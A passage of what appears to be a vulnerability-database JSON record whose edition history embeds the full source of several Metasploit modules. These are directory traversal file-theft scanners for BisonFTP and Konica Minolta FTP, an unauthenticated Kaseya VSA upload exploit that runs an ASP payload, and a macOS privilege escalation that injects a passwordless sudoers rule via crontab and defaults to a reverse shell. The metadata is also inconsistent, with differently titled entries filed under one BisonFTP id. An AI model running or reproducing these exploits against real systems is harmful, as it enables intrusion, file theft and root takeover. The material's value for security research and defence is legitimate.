theres still a sock to read from. 
Per #7582\n if sock.nil?\n error_msg = __FILE__ <<'::'<< __method__.to_s << ':' << 'data_connect failed; posssible invalid response'\n print_status(error_msg)\n elog(error_msg)\n return\n else\n # read the file data from the socket that we opened\n response_data = sock.read(1024)\n end\n\n unless response_data\n print_error(\"#{file} not found\")\n return\n end\n\n if response_data.length == 0\n print_status(\"File (#{file_path})from #{peer} is empty...\")\n return\n end\n\n # store file data to loot\n loot_file = store_loot(\"bisonware.ftp.data\", \"text\", rhost, response_data, file, file_path)\n vprint_status(\"Data returned:\\n\")\n vprint_line(response_data)\n print_good(\"Stored #{file_path} to #{loot_file}\")\n end\n\n rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout => e\n vprint_error(e.message)\n elog(\"#{e.class} #{e.message} #{e.backtrace * \"\\n\"}\")\n rescue ::Timeout::Error, ::Errno::EPIPE => e\n vprint_error(e.message)\n elog(\"#{e.class} #{e.message} #{e.backtrace * \"\\n\"}\")\n ensure\n data_disconnect\n disconnect\n end\n end\nend\n", "metasploitReliability": "", "metasploitHistory": ""}, "lastseen": "2019-06-18T04:31:49", "differentElements": ["cvelist", "cvss", "description", "modified", "published", "references", "sourceData", "sourceHref", "title"], "edition": 57}, {"bulletin": {"id": "MSF:AUXILIARY/SCANNER/FTP/BISON_FTP_TRAVERSAL", "hash": "fa3f39c9cedc241aff107efdef3c78fc", "type": "metasploit", "bulletinFamily": "exploit", "title": "Kaseya VSA uploader.aspx Arbitrary File Upload", "description": "This module exploits an arbitrary file upload vulnerability found in Kaseya VSA versions between 7 and 9.1. A malicious unauthenticated user can upload an ASP file to an arbitrary directory leading to arbitrary code execution with IUSR privileges. 
This module has been tested with Kaseya v7.0.0.17, v8.0.0.10 and v9.0.0.3.\n", "published": "2015-09-29T10:56:34", "modified": "2018-09-15T23:54:45", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": ["https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-6922", "https://raw.githubusercontent.com/pedrib/PoC/master/advisories/kaseya-vsa-vuln-2.txt", "https://seclists.org/bugtraq/2015/Sep/132"], "cvelist": ["CVE-2015-6922"], "lastseen": "2019-06-21T00:25:33", "history": [], "viewCount": 4, "enchantments": {"score": {"value": 5.7, "vector": "NONE", "modified": "2019-06-18T04:31:49"}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2015-7602"]}, {"type": "exploitdb", "idList": ["EDB-ID:38341"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310805753"]}], "modified": "2019-06-18T04:31:49"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/windows/http/kaseya_uploader.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::HttpClient\n include Msf::Exploit::EXE\n include Msf::Exploit::FileDropper\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Kaseya VSA uploader.aspx Arbitrary File Upload',\n 'Description' => %q{\n This module exploits an arbitrary file upload vulnerability found in Kaseya VSA versions\n between 7 and 9.1. A malicious unauthenticated user can upload an ASP file to an arbitrary\n directory leading to arbitrary code execution with IUSR privileges. 
This module has been\n tested with Kaseya v7.0.0.17, v8.0.0.10 and v9.0.0.3.\n },\n 'Author' =>\n [\n 'Pedro Ribeiro <pedrib[at]gmail.com>' # Vulnerability discovery and updated MSF module\n ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n ['CVE', '2015-6922'],\n ['ZDI', '15-449'],\n ['URL', 'https://raw.githubusercontent.com/pedrib/PoC/master/advisories/kaseya-vsa-vuln-2.txt'],\n ['URL', 'https://seclists.org/bugtraq/2015/Sep/132']\n ],\n 'Platform' => 'win',\n 'Arch' => ARCH_X86,\n 'Privileged' => false,\n 'Targets' =>\n [\n [ 'Kaseya VSA v7 to v9.1', {} ]\n ],\n 'DefaultTarget' => 0,\n 'DisclosureDate' => 'Sep 23 2015'))\n end\n\n\n def check\n res = send_request_cgi({\n 'method' => 'GET',\n 'uri' => normalize_uri('ConfigTab','uploader.aspx')\n })\n\n if res && res.code == 302 && res.body && res.body.to_s =~ /mainLogon\\.asp\\?logout=([0-9]*)/\n return Exploit::CheckCode::Detected\n else\n return Exploit::CheckCode::Unknown\n end\n end\n\n\n def upload_file(payload, path, filename, session_id)\n print_status(\"Uploading payload to #{path}...\")\n\n res = send_request_cgi({\n 'method' => 'POST',\n 'uri' => normalize_uri('ConfigTab', 'uploader.aspx'),\n 'vars_get' => {\n 'PathData' => path,\n 'qqfile' => filename\n },\n 'data' => payload,\n 'ctype' => 'application/octet-stream',\n 'cookie' => 'sessionId=' + session_id\n })\n\n if res && res.code == 200 && res.body && res.body.to_s.include?('\"success\": \"true\"')\n return true\n else\n return false\n end\n end\n\n\n def exploit\n res = send_request_cgi({\n 'method' => 'GET',\n 'uri' => normalize_uri('ConfigTab','uploader.aspx')\n })\n\n if res && res.code == 302 && res.body && res.body.to_s =~ /mainLogon\\.asp\\?logout=([0-9]*)/\n session_id = $1\n else\n fail_with(Failure::NoAccess, \"#{peer} - Failed to create a valid session\")\n end\n\n asp_name = \"#{rand_text_alpha_lower(8)}.asp\"\n exe = generate_payload_exe\n payload = Msf::Util::EXE.to_exe_asp(exe).to_s\n\n paths = [\n # We have to guess the path, 
so just try the most common directories\n 'C:\\\\Kaseya\\\\WebPages\\\\',\n 'C:\\\\Program Files\\\\Kaseya\\\\WebPages\\\\',\n 'C:\\\\Program Files (x86)\\\\Kaseya\\\\WebPages\\\\',\n 'D:\\\\Kaseya\\\\WebPages\\\\',\n 'D:\\\\Program Files\\\\Kaseya\\\\WebPages\\\\',\n 'D:\\\\Program Files (x86)\\\\Kaseya\\\\WebPages\\\\',\n 'E:\\\\Kaseya\\\\WebPages\\\\',\n 'E:\\\\Program Files\\\\Kaseya\\\\WebPages\\\\',\n 'E:\\\\Program Files (x86)\\\\Kaseya\\\\WebPages\\\\',\n ]\n\n paths.each do |path|\n if upload_file(payload, path, asp_name, session_id)\n register_files_for_cleanup(path + asp_name)\n print_status(\"Executing payload #{asp_name}\")\n\n send_request_cgi({\n 'uri' => normalize_uri(asp_name),\n 'method' => 'GET'\n })\n\n # Failure. The request timed out or the server went away.\n break if res.nil?\n # Success! Triggered the payload, should have a shell incoming\n break if res.code == 200\n end\n end\n\n end\nend\n", "metasploitReliability": "", "metasploitHistory": ""}, "lastseen": "2019-06-21T00:25:33", "differentElements": ["cvelist", "cvss", "description", "modified", "published", "references", "sourceData", "sourceHref", "title"], "edition": 58}, {"bulletin": {"id": "MSF:AUXILIARY/SCANNER/FTP/BISON_FTP_TRAVERSAL", "hash": "6123eff5a71875b9e71ace97b1126d75", "type": "metasploit", "bulletinFamily": "exploit", "title": "BisonWare BisonFTP Server 3.5 Directory Traversal Information Disclosure", "description": "This module exploits a directory traversal vulnerability found in BisonWare BisonFTP server version 3.5. 
This vulnerability allows an attacker to download arbitrary files from the server by crafting a RETR command including file system traversal strings such as '..//.'\n", "published": "2015-11-08T05:34:10", "modified": "2017-07-24T13:26:21", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:C/I:N/A:N"}, "href": "", "reporter": "Rapid7", "references": ["https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-7602"], "cvelist": ["CVE-2015-7602"], "lastseen": "2019-06-21T02:25:34", "history": [], "viewCount": 5, "enchantments": {"score": {"value": 5.7, "vector": "NONE", "modified": "2019-06-21T02:25:34"}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2015-7602"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310805753"]}, {"type": "exploitdb", "idList": ["EDB-ID:38341"]}], "modified": "2019-06-21T02:25:34"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/scanner/ftp/bison_ftp_traversal.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::Ftp\n include Msf::Auxiliary::Report\n include Msf::Auxiliary::Scanner\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'BisonWare BisonFTP Server 3.5 Directory Traversal Information Disclosure',\n 'Description' => %q{\n This module exploits a directory traversal vulnerability found in BisonWare BisonFTP server\n version 3.5. 
This vulnerability allows an attacker to download arbitrary files from the server\n by crafting a RETR command including file system traversal strings such as '..//.'\n },\n 'Platform' => 'win',\n 'Author' =>\n [\n 'Jay Turla', # @shipcod3, msf and initial discovery\n 'James Fitts',\n 'Brad Wolfe <brad.wolfe[at]gmail.com>'\n ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n [ 'EDB', '38341'],\n [ 'CVE', '2015-7602']\n ],\n 'DisclosureDate' => 'Sep 28 2015'\n ))\n\n register_options(\n [\n OptInt.new('DEPTH', [ true, 'Traversal Depth (to reach the root folder)', 32 ]),\n OptString.new('PATH', [ true, \"Path to the file to disclose, releative to the root dir.\", 'boot.ini'])\n ])\n\n end\n\n def check_host(ip)\n begin\n connect\n if /BisonWare BisonFTP server product V3\\.5/i === banner\n return Exploit::CheckCode::Appears\n end\n ensure\n disconnect\n end\n\n Exploit::CheckCode::Safe\n end\n\n def run_host(target_host)\n begin\n connect_login\n sock = data_connect\n\n # additional check per https://github.com/bwatters-r7/metasploit-framework/blob/b44568dd85759a1aa2160a9d41397f2edc30d16f/modules/auxiliary/scanner/ftp/bison_ftp_traversal.rb\n # and #7582\n if sock.nil?\n error_msg = __FILE__ <<'::'<< __method__.to_s << ':' << 'data_connect failed; posssible invalid response'\n print_status(error_msg)\n elog(error_msg)\n else\n file_path = datastore['PATH']\n file = ::File.basename(file_path)\n\n # make RETR request and store server response message...\n retr_cmd = ( \"..//\" * datastore['DEPTH'] ) + \"#{file_path}\"\n res = send_cmd( [\"RETR\", retr_cmd])\n\n # read the file data from the socket that we opened\n # dont assume theres still a sock to read from. 
Per #7582\n if sock.nil?\n error_msg = __FILE__ <<'::'<< __method__.to_s << ':' << 'data_connect failed; posssible invalid response'\n print_status(error_msg)\n elog(error_msg)\n return\n else\n # read the file data from the socket that we opened\n response_data = sock.read(1024)\n end\n\n unless response_data\n print_error(\"#{file} not found\")\n return\n end\n\n if response_data.length == 0\n print_status(\"File (#{file_path})from #{peer} is empty...\")\n return\n end\n\n # store file data to loot\n loot_file = store_loot(\"bisonware.ftp.data\", \"text\", rhost, response_data, file, file_path)\n vprint_status(\"Data returned:\\n\")\n vprint_line(response_data)\n print_good(\"Stored #{file_path} to #{loot_file}\")\n end\n\n rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout => e\n vprint_error(e.message)\n elog(\"#{e.class} #{e.message} #{e.backtrace * \"\\n\"}\")\n rescue ::Timeout::Error, ::Errno::EPIPE => e\n vprint_error(e.message)\n elog(\"#{e.class} #{e.message} #{e.backtrace * \"\\n\"}\")\n ensure\n data_disconnect\n disconnect\n end\n end\nend\n", "metasploitReliability": "", "metasploitHistory": ""}, "lastseen": "2019-06-21T02:25:34", "differentElements": ["cvelist", "cvss", "description", "modified", "published", "references", "sourceData", "sourceHref", "title"], "edition": 59}, {"bulletin": {"id": "MSF:AUXILIARY/SCANNER/FTP/BISON_FTP_TRAVERSAL", "hash": "8c633934351f84da22137da9ec2c53ae", "type": "metasploit", "bulletinFamily": "exploit", "title": "Mac OS X 10.9.5 / 10.10.5 - rsh/libmalloc Privilege Escalation", "description": "This module writes to the sudoers file without root access by exploiting rsh and malloc log files. Makes sudo require no password, giving access to su even if root is disabled. 
Works on OS X 10.9.5 to 10.10.5 (patched on 10.11).\n", "published": "2015-10-16T21:39:07", "modified": "2018-11-04T05:28:32", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}, "href": "", "reporter": "Rapid7", "references": ["https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-5889"], "cvelist": ["CVE-2015-5889"], "lastseen": "2019-06-24T20:25:26", "history": [], "viewCount": 5, "enchantments": {"score": {"value": 5.7, "vector": "NONE", "modified": "2019-06-21T02:25:34"}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2015-7602"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310805753"]}, {"type": "exploitdb", "idList": ["EDB-ID:38341"]}], "modified": "2019-06-21T02:25:34"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/osx/local/rsh_libmalloc.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Local\n Rank = NormalRanking\n\n include Msf::Post::File\n include Msf::Post::OSX::Priv\n include Msf::Post::OSX::System\n include Msf::Exploit::EXE\n include Msf::Exploit::FileDropper\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Mac OS X 10.9.5 / 10.10.5 - rsh/libmalloc Privilege Escalation',\n 'Description' => %q{\n This module writes to the sudoers file without root access by exploiting rsh and malloc log files.\n Makes sudo require no password, giving access to su even if root is disabled.\n Works on OS X 10.9.5 to 10.10.5 (patched on 10.11).\n },\n 'Author' => [\n 'rebel', # Vulnerability discovery and PoC\n 'shandelman116' # Copy/paste AND translator monkey\n ],\n 'References' => [\n ['EDB', '38371'],\n ['CVE', '2015-5889']\n ],\n 'DisclosureDate' => 'Oct 1 2015',\n 'License' => MSF_LICENSE,\n # Want to ensure that this can be used on Python Meterpreter sessions as well\n 'Platform' => 
['osx', 'python'],\n 'Arch' => [ARCH_X64, ARCH_PYTHON],\n 'SessionTypes' => ['shell', 'meterpreter'],\n 'Privileged' => true,\n 'Targets' => [\n ['Mac OS X 10.9.5-10.10.5', {}]\n ],\n 'DefaultTarget' => 0,\n 'DefaultOptions' => {\n 'PAYLOAD' => 'osx/x64/shell_reverse_tcp'\n }\n ))\n\n register_options [\n OptInt.new('WaitTime', [true, 'Seconds to wait for exploit to work', 60]),\n OptString.new('WritableDir', [true, 'Writable directory', '/.Trashes'])\n ]\n end\n\n def base_dir\n datastore['WritableDir'].to_s\n end\n\n def exploit\n if is_root?\n fail_with Failure::BadConfig, 'Session already has root privileges'\n end\n\n unless writable? base_dir\n fail_with Failure::BadConfig, \"#{base_dir} is not writable\"\n end\n\n # Check OS\n os_check\n\n # Check if crontab file existed already so it can be restored at cleanup\n if file_exist? \"/etc/crontab\"\n @crontab_original = read_file(\"/etc/crontab\")\n else\n @crontab_original = nil\n end\n\n # Writing payload\n if payload.arch.include?(ARCH_X64)\n vprint_status(\"Writing payload to #{payload_file}.\")\n write_file(payload_file, payload_source)\n vprint_status(\"Finished writing payload file.\")\n register_file_for_cleanup(payload_file)\n elsif payload.arch.include?(ARCH_PYTHON)\n vprint_status(\"No need to write payload. Will simply execute after exploit\")\n vprint_status(\"Payload encodeded is #{payload.encoded}\")\n end\n\n # Run exploit\n sploit\n\n # Execute payload\n print_status('Executing payload...')\n if payload.arch.include?(ARCH_X64)\n cmd_exec(\"chmod +x #{payload_file}; #{payload_file} & disown\")\n elsif payload.arch.include?(ARCH_PYTHON)\n cmd_exec(\"python -c \\\"#{payload.encoded}\\\" & disown\")\n end\n vprint_status(\"Finished executing payload.\")\n end\n\n def os_check\n # Get sysinfo\n sysinfo = get_sysinfo\n # Make sure its OS X (Darwin)\n unless sysinfo[\"Kernel\"].include? 
\"Darwin\"\n print_warning(\"The target system does not appear to be running OS X!\")\n print_warning(\"Kernel information: #{sysinfo['Kernel']}\")\n return\n end\n # Make sure its not greater than 10.5 or less than 9.5\n version = sysinfo[\"ProductVersion\"]\n minor_version = version[3...version.length].to_f\n unless minor_version >= 9.5 && minor_version <= 10.5\n print_warning(\"The target version of OS X does not appear to be compatible with the exploit!\")\n print_warning(\"Target is running OS X #{sysinfo['ProductVersion']}\")\n end\n end\n\n def sploit\n user = cmd_exec(\"whoami\").chomp\n vprint_status(\"The current effective user is #{user}. Starting the sploit\")\n # Get size of sudoers file\n sudoer_path = \"/etc/sudoers\"\n size = get_stat_size(sudoer_path)\n\n # Set up the environment and command for spawning rsh and writing to crontab file\n rb_script = \"e={\\\"MallocLogFile\\\"=>\\\"/etc/crontab\\\",\\\"MallocStackLogging\\\"=>\\\"yes\\\",\\\"MallocStackLoggingDirectory\\\"=>\\\"a\\n* * * * * root echo \\\\\\\"ALL ALL=(ALL) NOPASSWD: ALL\\\\\\\" >> /etc/sudoers\\n\\n\\n\\n\\n\\\"}; Process.spawn(e,[\\\"/usr/bin/rsh\\\",\\\"rsh\\\"],\\\"localhost\\\",[:out, :err]=>\\\"/dev/null\\\")\"\n rb_cmd = \"ruby -e '#{rb_script}'\"\n\n # Attempt to execute\n print_status(\"Attempting to write /etc/crontab...\")\n cmd_exec(rb_cmd)\n vprint_status(\"Now to check whether the script worked...\")\n\n # Check whether it worked\n crontab = read_file(\"/etc/crontab\")\n vprint_status(\"Reading crontab yielded the following response: #{crontab}\")\n unless crontab.include? \"ALL ALL=(ALL) NOPASSWD: ALL\"\n vprint_error(\"Bad news... 
it did not write to the file.\")\n fail_with(Failure::NotVulnerable, \"Could not successfully write to crontab file.\")\n end\n\n print_good(\"Succesfully wrote to crontab file!\")\n\n # Wait for sudoers to change\n new_size = get_stat_size(sudoer_path)\n print_status(\"Waiting for sudoers file to change...\")\n\n # Start timeout block\n begin\n Timeout.timeout(datastore['WaitTime']) {\n while new_size <= size\n Rex.sleep(1)\n new_size = get_stat_size(sudoer_path)\n end\n }\n rescue Timeout::Error\n fail_with(Failure::TimeoutExpired, \"Sudoers file size has still not changed after waiting the maximum amount of time. Try increasing WaitTime.\")\n end\n print_good(\"Sudoers file has changed!\")\n\n # Confirming root access\n print_status(\"Attempting to start root shell...\")\n cmd_exec(\"sudo -s su\")\n user = cmd_exec(\"whoami\")\n unless user.include? \"root\"\n fail_with(Failure::UnexpectedReply, \"Unable to acquire root access. Whoami returned: #{user}\")\n end\n print_good(\"Success! 
Acquired root access!\")\n end\n\n def get_stat_size(file_path)\n cmd = \"env -i [$(stat -s #{file_path})] bash -c 'echo $st_size'\"\n response = cmd_exec(cmd)\n vprint_status(\"Response to stat size query is #{response}\")\n begin\n size = Integer(response)\n return size\n rescue ArgumentError\n fail_with(Failure::UnexpectedReply, \"Could not get stat size!\")\n end\n end\n\n def payload_source\n if payload.arch.include?(ARCH_X64)\n return Msf::Util::EXE.to_osx_x64_macho(framework, payload.encoded)\n elsif payload.arch.include?(ARCH_PYTHON)\n return payload.encoded\n end\n end\n\n def payload_file\n @payload_file ||= \"#{base_dir}/#{Rex::Text.rand_text_alpha(8)}\"\n end\n\n def cleanup\n vprint_status(\"Starting the cron restore process...\")\n super\n # Restore crontab back to is original state\n # If we don't do this, then cron will continue to append the no password rule to sudoers.\n if @crontab_original.nil?\n # Erase crontab file and kill cron process since it did not exist before\n vprint_status(\"Killing cron process and removing crontab file since it did not exist prior to exploit.\")\n rm_ret = cmd_exec(\"rm /etc/crontab 2>/dev/null; echo $?\")\n if rm_ret.chomp.to_i == 0\n vprint_good(\"Successfully removed crontab file!\")\n else\n print_warning(\"Could not remove crontab file.\")\n end\n Rex.sleep(1)\n kill_ret = cmd_exec(\"killall cron 2>/dev/null; echo $?\")\n if kill_ret.chomp.to_i == 0\n vprint_good(\"Succesfully killed cron!\")\n else\n print_warning(\"Could not kill cron process.\")\n end\n else\n # Write back the original content of crontab\n vprint_status(\"Restoring crontab file back to original contents. 
No need for it anymore.\")\n cmd_exec(\"echo '#{@crontab_original}' > /etc/crontab\")\n end\n vprint_status(\"Finished the cleanup process.\")\n end\nend\n", "metasploitReliability": "", "metasploitHistory": ""}, "lastseen": "2019-06-24T20:25:26", "differentElements": ["cvelist", "cvss", "description", "modified", "published", "references", "sourceData", "sourceHref", "title"], "edition": 60}, {"bulletin": {"id": "MSF:AUXILIARY/SCANNER/FTP/BISON_FTP_TRAVERSAL", "hash": "6123eff5a71875b9e71ace97b1126d75", "type": "metasploit", "bulletinFamily": "exploit", "title": "BisonWare BisonFTP Server 3.5 Directory Traversal Information Disclosure", "description": "This module exploits a directory traversal vulnerability found in BisonWare BisonFTP server version 3.5. This vulnerability allows an attacker to download arbitrary files from the server by crafting a RETR command including file system traversal strings such as '..//.'\n", "published": "2015-11-08T05:34:10", "modified": "2017-07-24T13:26:21", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:C/I:N/A:N"}, "href": "", "reporter": "Rapid7", "references": ["https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-7602"], "cvelist": ["CVE-2015-7602"], "lastseen": "2019-06-25T00:24:41", "history": [], "viewCount": 5, "enchantments": {"score": {"value": 5.7, "vector": "NONE", "modified": "2019-06-25T00:24:41"}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2015-7602"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310805753"]}, {"type": "exploitdb", "idList": ["EDB-ID:38341"]}], "modified": "2019-06-25T00:24:41"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/scanner/ftp/bison_ftp_traversal.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::Ftp\n 
include Msf::Auxiliary::Report\n include Msf::Auxiliary::Scanner\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'BisonWare BisonFTP Server 3.5 Directory Traversal Information Disclosure',\n 'Description' => %q{\n This module exploits a directory traversal vulnerability found in BisonWare BisonFTP server\n version 3.5. This vulnerability allows an attacker to download arbitrary files from the server\n by crafting a RETR command including file system traversal strings such as '..//.'\n },\n 'Platform' => 'win',\n 'Author' =>\n [\n 'Jay Turla', # @shipcod3, msf and initial discovery\n 'James Fitts',\n 'Brad Wolfe <brad.wolfe[at]gmail.com>'\n ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n [ 'EDB', '38341'],\n [ 'CVE', '2015-7602']\n ],\n 'DisclosureDate' => 'Sep 28 2015'\n ))\n\n register_options(\n [\n OptInt.new('DEPTH', [ true, 'Traversal Depth (to reach the root folder)', 32 ]),\n OptString.new('PATH', [ true, \"Path to the file to disclose, releative to the root dir.\", 'boot.ini'])\n ])\n\n end\n\n def check_host(ip)\n begin\n connect\n if /BisonWare BisonFTP server product V3\\.5/i === banner\n return Exploit::CheckCode::Appears\n end\n ensure\n disconnect\n end\n\n Exploit::CheckCode::Safe\n end\n\n def run_host(target_host)\n begin\n connect_login\n sock = data_connect\n\n # additional check per https://github.com/bwatters-r7/metasploit-framework/blob/b44568dd85759a1aa2160a9d41397f2edc30d16f/modules/auxiliary/scanner/ftp/bison_ftp_traversal.rb\n # and #7582\n if sock.nil?\n error_msg = __FILE__ <<'::'<< __method__.to_s << ':' << 'data_connect failed; posssible invalid response'\n print_status(error_msg)\n elog(error_msg)\n else\n file_path = datastore['PATH']\n file = ::File.basename(file_path)\n\n # make RETR request and store server response message...\n retr_cmd = ( \"..//\" * datastore['DEPTH'] ) + \"#{file_path}\"\n res = send_cmd( [\"RETR\", retr_cmd])\n\n # read the file data from the socket that we opened\n # dont assume 
theres still a sock to read from. Per #7582\n if sock.nil?\n error_msg = __FILE__ <<'::'<< __method__.to_s << ':' << 'data_connect failed; posssible invalid response'\n print_status(error_msg)\n elog(error_msg)\n return\n else\n # read the file data from the socket that we opened\n response_data = sock.read(1024)\n end\n\n unless response_data\n print_error(\"#{file} not found\")\n return\n end\n\n if response_data.length == 0\n print_status(\"File (#{file_path})from #{peer} is empty...\")\n return\n end\n\n # store file data to loot\n loot_file = store_loot(\"bisonware.ftp.data\", \"text\", rhost, response_data, file, file_path)\n vprint_status(\"Data returned:\\n\")\n vprint_line(response_data)\n print_good(\"Stored #{file_path} to #{loot_file}\")\n end\n\n rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout => e\n vprint_error(e.message)\n elog(\"#{e.class} #{e.message} #{e.backtrace * \"\\n\"}\")\n rescue ::Timeout::Error, ::Errno::EPIPE => e\n vprint_error(e.message)\n elog(\"#{e.class} #{e.message} #{e.backtrace * \"\\n\"}\")\n ensure\n data_disconnect\n disconnect\n end\n end\nend\n", "metasploitReliability": "", "metasploitHistory": ""}, "lastseen": "2019-06-25T00:24:41", "differentElements": ["cvelist", "description", "published", "references", "sourceData", "sourceHref", "title"], "edition": 61}, {"bulletin": {"id": "MSF:AUXILIARY/SCANNER/FTP/BISON_FTP_TRAVERSAL", "hash": "e6a0cb741398882322ccd7a3801fca77", "type": "metasploit", "bulletinFamily": "exploit", "title": "Konica Minolta FTP Utility 1.00 Directory Traversal Information Disclosure", "description": "This module exploits a directory traversal vulnerability found in Konica Minolta FTP Utility 1.0. 
This vulnerability allows an attacker to download arbitrary files from the server by crafting a RETR command that includes file system traversal strings such as '..//'\n", "published": "2015-11-12T23:51:42", "modified": "2017-07-24T13:26:21", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:C/I:N/A:N"}, "href": "", "reporter": "Rapid7", "references": ["https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-7603", "http://shinnai.altervista.org/exploits/SH-0024-20150922.html"], "cvelist": ["CVE-2015-7603"], "lastseen": "2019-06-27T00:26:34", "history": [], "viewCount": 5, "enchantments": {"score": {"value": 5.7, "vector": "NONE", "modified": "2019-06-25T00:24:41"}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2015-7602"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310805753"]}, {"type": "exploitdb", "idList": ["EDB-ID:38341"]}], "modified": "2019-06-25T00:24:41"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/scanner/ftp/konica_ftp_traversal.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::Ftp\n include Msf::Auxiliary::Report\n include Msf::Auxiliary::Scanner\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Konica Minolta FTP Utility 1.00 Directory Traversal Information Disclosure',\n 'Description' => %q{\n This module exploits a directory traversal vulnerability found in Konica Minolta FTP Utility 1.0.\n This vulnerability allows an attacker to download arbitrary files from the server by crafting\n a RETR command that includes file system traversal strings such as '..//'\n },\n 'Platform' => 'win',\n 'Author' =>\n [\n 'Jay Turla', # @shipcod3, msf\n 'James Fitts', # msf\n 'Brad Wolfe <brad.wolfe[at]gmail.com>', # msf\n 'shinnai' # initial discovery\n ],\n 
'License' => MSF_LICENSE,\n 'References' =>\n [\n [ 'EDB', '38260'],\n [ 'CVE', '2015-7603'],\n [ 'URL', 'http://shinnai.altervista.org/exploits/SH-0024-20150922.html']\n ],\n 'DisclosureDate' => 'Sep 22 2015'\n ))\n\n register_options(\n [\n OptInt.new('DEPTH', [ true, 'Traversal Depth (to reach the root folder)', 32 ]),\n OptString.new('PATH', [ true, \"Path to the file to disclose, releative to the root dir.\", 'boot.ini'])\n ])\n end\n\n def check_host(ip)\n begin\n connect\n if /FTP Utility FTP server \\(Version 1\\.00\\)/i === banner\n return Exploit::CheckCode::Appears\n end\n ensure\n disconnect\n end\n\n Exploit::CheckCode::Safe\n end\n\n def run_host(target_host)\n begin\n # Login anonymously and open the socket that we'll use for data retrieval.\n connect_login\n sock = data_connect\n if sock.nil?\n error_msg = __FILE__ <<'::'<< __method__.to_s << ':' << 'data_connect failed; posssible invalid response'\n print_status(error_msg)\n elog(error_msg)\n else\n file_path = datastore['PATH']\n file = ::File.basename(file_path)\n\n # make RETR request and store server response message...\n retr_cmd = ( \"..//\" * datastore['DEPTH'] ) + \"#{file_path}\"\n res = send_cmd( [\"RETR\", retr_cmd])\n\n # read the file data from the socket that we opened\n # dont assume theres still a sock to read from. Per #7582\n if sock.nil?\n error_msg = __FILE__ <<'::'<< __method__.to_s << ':' << 'data_connect failed; posssible invalid response'\n print_status(error_msg)\n elog(error_msg)\n return\n else\n # read the file data from the socket that we opened\n response_data = sock.read(1024)\n end\n\n unless response_data\n print_error(\"#{file_path} not found\")\n return\n end\n\n if response_data.length == 0 or ! 
(res =~ /^150/ )\n print_status(\"File (#{file_path})from #{peer} is empty...\")\n return\n end\n\n # store file data to loot\n loot_file = store_loot(\"konica.ftp.data\", \"text\", rhost, response_data, file, file_path)\n vprint_status(\"Data returned:\\n\")\n vprint_line(response_data)\n print_good(\"Stored #{file_path} to #{loot_file}\")\n end\n\n rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout => e\n vprint_error(e.message)\n elog(\"#{e.class} #{e.message} #{e.backtrace * \"\\n\"}\")\n rescue ::Timeout::Error, ::Errno::EPIPE => e\n vprint_error(e.message)\n elog(\"#{e.class} #{e.message} #{e.backtrace * \"\\n\"}\")\n ensure\n data_disconnect\n disconnect\n end\n end\nend\n", "metasploitReliability": "", "metasploitHistory": ""}, "lastseen": "2019-06-27T00:26:34", "differentElements": ["cvelist", "description", "published", "references", "sourceData", "sourceHref", "title"], "edition": 62}, {"bulletin": {"id": "MSF:AUXILIARY/SCANNER/FTP/BISON_FTP_TRAVERSAL", "hash": "6123eff5a71875b9e71ace97b1126d75", "type": "metasploit", 